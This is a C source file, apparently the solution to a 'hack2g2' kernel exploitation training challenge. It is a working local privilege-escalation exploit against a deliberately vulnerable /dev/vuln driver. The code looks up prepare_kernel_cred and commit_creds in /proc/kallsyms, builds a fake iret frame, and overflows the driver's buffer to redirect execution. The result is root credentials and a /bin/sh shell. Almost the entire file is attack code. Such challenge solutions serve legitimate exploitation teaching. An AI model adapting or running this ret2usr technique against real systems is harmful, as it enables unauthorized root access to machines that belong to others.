exploit-solution.c

/****************************************************
 * 
 * File Name 		:exploit.c
 * Created by		:Guillaume Francqueville
 * Creation date	:septembre 07th, 2016
 * Last changed by 	:Guillaume Francqueville 
 * Last change 		:septembre 24th, 2016 15:09
 * Description		:hack2g2 kenerle exploit
 *
****************************************************/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <stdint.h>
#include <sys/user.h>

struct fake_frame {  
    void *eip;         // shell()
    uint32_t cs;       // %cs
    uint32_t eflags;   // eflags
    void *esp;         // %esp
    uint32_t ss;       // %ss
} __attribute__((packed)) ff;

void* (*prepare_kernel_cred)(void*)  __attribute__((regparm(3)));  
void* (*commit_creds)(void*) __attribute__((regparm(3)));

void shell(void) {
  execl("/bin/sh", "sh", 0);
}

void payload(void) {  
    commit_creds(prepare_kernel_cred(0));    
    asm("mov $ff, %esp;"
	"iret;");
}

/*
 * Setup the fake frame
 * |ss     | Lower
 * |esp    |
 * |eflags |
 * |cs     |
 * |eip    |
 */
void setup_ff(void) {  
    asm("pushl %cs;  popl ff+4;"
        "pushfl;     popl ff+8;"
	"pushl %esp; popl ff+12;"
        "pushl %ss;  popl ff+16;");
    ff.eip = &shell;
    ff.esp -= 1024;

    fprintf(stdout,"ff.eip : %x\n",ff.eip);
    fprintf(stdout,"ff.cs : %x\n",ff.cs);
    fprintf(stdout,"ff.eflags : %x\n",ff.eflags);
    fprintf(stdout,"ff.esp : %x\n",ff.esp);
    fprintf(stdout,"ff.ss : %x\n",ff.ss);

}

int main(int argc, char ** argv){
  FILE* f;
  int i;
  char yeah[50];
  FILE* fd;
  int ret = 0;
  unsigned long addr;
  char dummy;
  char sname[512];
  
  fprintf(stdout,"[+] launching exploit\n");
  
  // Get needed addresses
  fd = fopen("/proc/kallsyms", "r");
  if(fd == NULL) {
    perror("fopen()");
    return -1;
  }
  while(ret != EOF) {
    ret = fscanf(fd, "%p %c %sn", (void **)&addr, &dummy, sname);
    if(prepare_kernel_cred && commit_creds)
      break;
    else
      if(!strncmp(sname, "prepare_kernel_cred", 512))
	prepare_kernel_cred = (void*)addr;
      else
        if(!strncmp(sname, "commit_creds", 512))
	  commit_creds = (void*)addr;
  }
  fclose(fd);
  
  fprintf(stdout, "[+] commit_creds at %p\n", commit_creds);
  fprintf(stdout, "[+] prepare_kernel_cred %p\n", prepare_kernel_cred);
  

  fprintf(stdout,"[+] payload at : %x\n",&payload);

  // setup fake frame
  fprintf(stdout, "[+] preparing fake frame\n");
  setup_ff();
  
  fprintf(stdout,"[+] ready to pwn !\n");
  for(i=0;i<64;i++){
    if((f = fopen("/dev/vuln","w+")) == NULL){
      printf("[-] cannot open /dev/vuln\n");
      exit(1);
    }
    fprintf(f,"B");
    fclose(f);
  }

  if((f = fopen("/dev/vuln","w+")) == NULL){
      printf("[-] cannot open /dev/vuln\n");
      exit(1);
    }
  fprintf(f,"\x7c");
  fclose(f);

  if((f = fopen("/dev/vuln","w+")) == NULL){
      printf("[-] cannot open /dev/vuln\n");
      exit(1);
    }
  fprintf(f,"\x88");
  fclose(f);
  if((f = fopen("/dev/vuln","w+")) == NULL){
      printf("[-] cannot open /dev/vuln\n");
      exit(1);
    }
  fprintf(f,"\x04");
  fclose(f);
  if((f = fopen("/dev/vuln","w+")) == NULL){
      printf("[-] cannot open /dev/vuln\n");
      exit(1);
    }
  fprintf(f,"\x08");
  fclose(f);
  
  if((f = fopen("/dev/vuln","r")) == NULL){
    printf(":(");
    exit(1);
  }
  
  printf("[+] let's go !");
  fgets(yeah,49,f);
  fclose(f);
}